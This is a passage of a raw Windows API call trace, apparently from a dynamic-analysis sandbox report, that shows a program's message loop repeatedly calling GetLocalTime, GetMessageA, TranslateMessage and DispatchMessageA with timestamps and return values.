returned 0x0 [0120.573] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x13a)) [0120.573] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x13a)) [0120.573] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.594] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.594] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.594] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x14f)) [0120.594] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x14f)) [0120.594] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.604] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.604] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.604] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x159)) [0120.604] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x159)) [0120.604] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.626] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.626] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.627] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x16f)) [0120.627] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x170)) [0120.627] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.637] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.637] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.637] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x17a)) [0120.637] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x17a)) [0120.637] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.659] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.659] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.659] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x190)) [0120.659] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x190)) [0120.659] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.669] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.669] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.669] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x19a)) [0120.669] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x19a)) [0120.669] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.693] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.693] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.693] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1b2)) [0120.693] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1b2)) [0120.693] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.700] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.700] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.700] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1b9)) [0120.700] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1b9)) [0120.700] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.722] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.722] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.722] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1cf)) [0120.722] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1cf)) [0120.722] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.733] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.733] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.733] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1da)) [0120.733] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1da)) [0120.733] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.753] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.753] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.753] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1ee)) [0120.753] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1ee)) [0120.753] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.764] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.764] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.764] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1f9)) [0120.764] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1f9)) [0120.764] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.786] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.786] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.786] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x20f)) [0120.786] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x20f)) [0120.786] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.839] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.839] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.839] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x244)) [0120.839] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x244)) [0120.839] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.858] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.858] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.859] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x257)) [0120.859] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x258)) [0120.859] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.880] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.880] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.880] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x26d)) [0120.880] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x26d)) [0120.880] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.891] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.891] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.891] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x278)) [0120.891] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x278)) [0120.891] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x284)) [0120.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x284)) [0120.903] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.925] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.925] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.925] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x29a)) [0120.925] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x29a)) [0120.925] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.935] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.935] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.935] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2a4)) [0120.935] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2a4)) [0120.935] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.956] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.956] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.956] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2b9)) [0120.956] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2b9)) [0120.956] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.966] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.966] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.966] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2c3)) [0120.966] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2c3)) [0120.966] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.987] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.987] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.987] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2d8)) [0120.987] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2d8)) [0120.987] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.997] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.997] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.997] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2e2)) [0120.997] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2e2)) [0120.997] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.017] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.017] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.017] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2f6)) [0121.017] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x2f6)) [0121.017] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.028] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.028] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.028] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x301)) [0121.028] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x301)) [0121.028] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.041] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.041] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.041] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x30e)) [0121.041] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x30e)) [0121.041] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.062] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.062] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.062] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x323)) [0121.062] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x323)) [0121.062] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.073] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.073] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.073] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x32e)) [0121.073] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x32e)) [0121.073] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.094] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.094] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.094] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x343)) [0121.094] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x343)) [0121.094] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.105] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.105] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.105] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x34e)) [0121.105] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x34e)) [0121.105] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.126] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.126] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.126] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x363)) [0121.126] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x363)) [0121.126] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.139] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.139] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.139] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x370)) [0121.139] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x370)) [0121.139] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.167] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.167] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.167] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x38c)) [0121.167] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x38c)) [0121.167] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.171] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.171] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.171] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x390)) [0121.171] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x390)) [0121.171] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0121.182] TranslateMessage (lpMsg=0x2347a14) returned 0 [0121.182] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0121.182] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x39b)) [0121.182] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x39b)) [0121.182] GetMessageA (in: 